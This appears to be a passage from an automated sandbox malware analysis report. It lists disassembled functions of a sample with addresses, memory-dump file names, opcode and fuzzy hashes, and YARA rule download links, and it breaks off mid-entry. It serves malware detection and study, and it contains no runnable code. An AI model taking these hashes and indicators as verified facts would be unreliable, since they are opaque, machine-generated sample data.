                                                                                                      • Opcode ID: 884f8d330dec70514cbd7d186094ef5becfb1df07d02492aa4dec2abf66aaaef
                                                                                                      • Instruction ID: 50ebb8b9d5b2773ea6e8cb3998dbfd48eebfce5845c18d2bb50eae49842d182a
                                                                                                      • Opcode Fuzzy Hash: 884f8d330dec70514cbd7d186094ef5becfb1df07d02492aa4dec2abf66aaaef
                                                                                                      • Instruction Fuzzy Hash: BAD101A2D146A89AF720CB25EC44BEA7775EF50310F1481FAD80EAB281D67D4FC18F16
                                                                                                      Function 00405718 Relevance: 17.8, Strings: 14, Instructions: 318COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 577bc9c47f5731ba5c9699310a858ab68c728139b54564865463a2cd78fd4c77
                                                                                                      • Instruction ID: 060a974f5272d4f69e30a0a0576ebddbbf19a127735e5147090aa164a9acd5b8
                                                                                                      • Opcode Fuzzy Hash: 577bc9c47f5731ba5c9699310a858ab68c728139b54564865463a2cd78fd4c77
                                                                                                      • Instruction Fuzzy Hash: C2D16AB1D0412A8BEB24CB14DC94AFAB7B6FF84304F1481FAD80967691DA385EC1CF55
                                                                                                      Function 004062C8 Relevance: 17.8, Strings: 14, Instructions: 299COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 73d81dca585a2366b706441fb56f31a7b2849d5934a950254dbf3d3773904f16
                                                                                                      • Instruction ID: 8b6f7ca83f98f34eec4d02ea423da0a759ff8c4aedaed5326371b8c09c03cad8
                                                                                                      • Opcode Fuzzy Hash: 73d81dca585a2366b706441fb56f31a7b2849d5934a950254dbf3d3773904f16
                                                                                                      • Instruction Fuzzy Hash: 6EC1EEB1D045A89BEB24CB14DC54BEAB7B1EB51300F1881FAC40EA7281DA7D5FD18F16
                                                                                                      Function 0040639C Relevance: 17.8, Strings: 14, Instructions: 281COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 7ee492cb7e52e44a8a4b61bfcd9a163f88e7d019357767a68602885ba2ad9589
                                                                                                      • Instruction ID: 241fddac82c705969809961a2ed09d358a6cee86a4f59384594f1062119de0e1
                                                                                                      • Opcode Fuzzy Hash: 7ee492cb7e52e44a8a4b61bfcd9a163f88e7d019357767a68602885ba2ad9589
                                                                                                      • Instruction Fuzzy Hash: 0AB113B1D045A49BFB208B15EC54BEA77B5EB91301F1880FAC40EA6281DA7D5FD18F16
                                                                                                      Function 0040610F Relevance: 17.8, Strings: 14, Instructions: 268COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: e7122bb659f9e92b11b8c494e4ff2d0e21a9549200d9d2ef69626d11de1a7daf
                                                                                                      • Instruction ID: d60b1555afdfddf63e2072b2cfe1993f01f4b62609e65d0dc9548b0c0ddb1774
                                                                                                      • Opcode Fuzzy Hash: e7122bb659f9e92b11b8c494e4ff2d0e21a9549200d9d2ef69626d11de1a7daf
                                                                                                      • Instruction Fuzzy Hash: 71A100B2D146989EF7208A21EC48BEA7775EB50300F1441FAD40EAB281D67D5FD18F26
                                                                                                      Function 004060CD Relevance: 17.8, Strings: 14, Instructions: 259COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 82954e1c74e93a9cf52dd8dc415c960afa308a1e6334993f18bdf781623a44b8
                                                                                                      • Instruction ID: a4c3da1dc7981e359dcf0c24b976f260ab5cef70973b527c999cfb54c8e6f742
                                                                                                      • Opcode Fuzzy Hash: 82954e1c74e93a9cf52dd8dc415c960afa308a1e6334993f18bdf781623a44b8
                                                                                                      • Instruction Fuzzy Hash: 75A113A2D146949EF7208A25EC14BEA7779EB50310F1841FAD40DEB2C1D27E5FD18F26
                                                                                                      Function 00406427 Relevance: 17.7, Strings: 14, Instructions: 246COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 4cf06380f4fb0d047b50a809829acad746c5b72e3abf571efce19ce8f1988b4a
                                                                                                      • Instruction ID: 813afd2d321b8a81ff93c0b7307c2df148e293b91a7ba828ba503c901ab722ce
                                                                                                      • Opcode Fuzzy Hash: 4cf06380f4fb0d047b50a809829acad746c5b72e3abf571efce19ce8f1988b4a
                                                                                                      • Instruction Fuzzy Hash: DDA123A2D146989FFB208A21EC14BEA77B5EB50300F1841FAC40EA72C1D67D5FD18F26
                                                                                                      Function 00406461 Relevance: 17.7, Strings: 14, Instructions: 233COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 38e31151bf2caa3fbb696fb8cd590a51bab44206d872bde1202fa38bdd456ce7
                                                                                                      • Instruction ID: cb77ba98a45ee1e725e11e10a4223e476c76699770f9e33db9b09b6eb9a6bc68
                                                                                                      • Opcode Fuzzy Hash: 38e31151bf2caa3fbb696fb8cd590a51bab44206d872bde1202fa38bdd456ce7
                                                                                                      • Instruction Fuzzy Hash: D49125A2D146949BF7208721EC14BEA77B5EB50300F1841FAD40EAB2C1D67E4FD18F26
                                                                                                      Function 00406400 Relevance: 17.7, Strings: 14, Instructions: 232COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 63aab698a8c629a51c66b40dbbe4970d5a0f0e6158bcda433d9220d5851d6539
                                                                                                      • Instruction ID: 315065684dd89ff1d2e84ddbcec2ed6b71b1de9571e5e4d89f1592ff9c831105
                                                                                                      • Opcode Fuzzy Hash: 63aab698a8c629a51c66b40dbbe4970d5a0f0e6158bcda433d9220d5851d6539
                                                                                                      • Instruction Fuzzy Hash: 089123A1D146949BF7208A21EC14BEA7775EF90301F1841FAD40EAB2C1D67E4FD18F26
                                                                                                      Function 00406486 Relevance: 17.7, Strings: 14, Instructions: 225COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 71cf9295ef58685f610d503d4e6f1bd44dcc49cd21b800b61fcd39d2c5dccfe2
                                                                                                      • Instruction ID: 98770b44c7d1e8d4b1982fd4fcfb96356e2684690e7493add2a585b1b33ddea8
                                                                                                      • Opcode Fuzzy Hash: 71cf9295ef58685f610d503d4e6f1bd44dcc49cd21b800b61fcd39d2c5dccfe2
                                                                                                      • Instruction Fuzzy Hash: 559113B1D146989AFB208A15EC14BEA77B5EB50300F1841FAD40EAB2C1D67E4FD58F16
                                                                                                      Function 00406247 Relevance: 17.7, Strings: 14, Instructions: 208COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 556d78595065429114074fbdab265b4be9bfb1b2001a4eeb08d27f6d5e4d7e03
                                                                                                      • Instruction ID: 0d8c8113ffbcae8e260cb43d46f6751e07072b479e8c1f61b1b8f062278aea2c
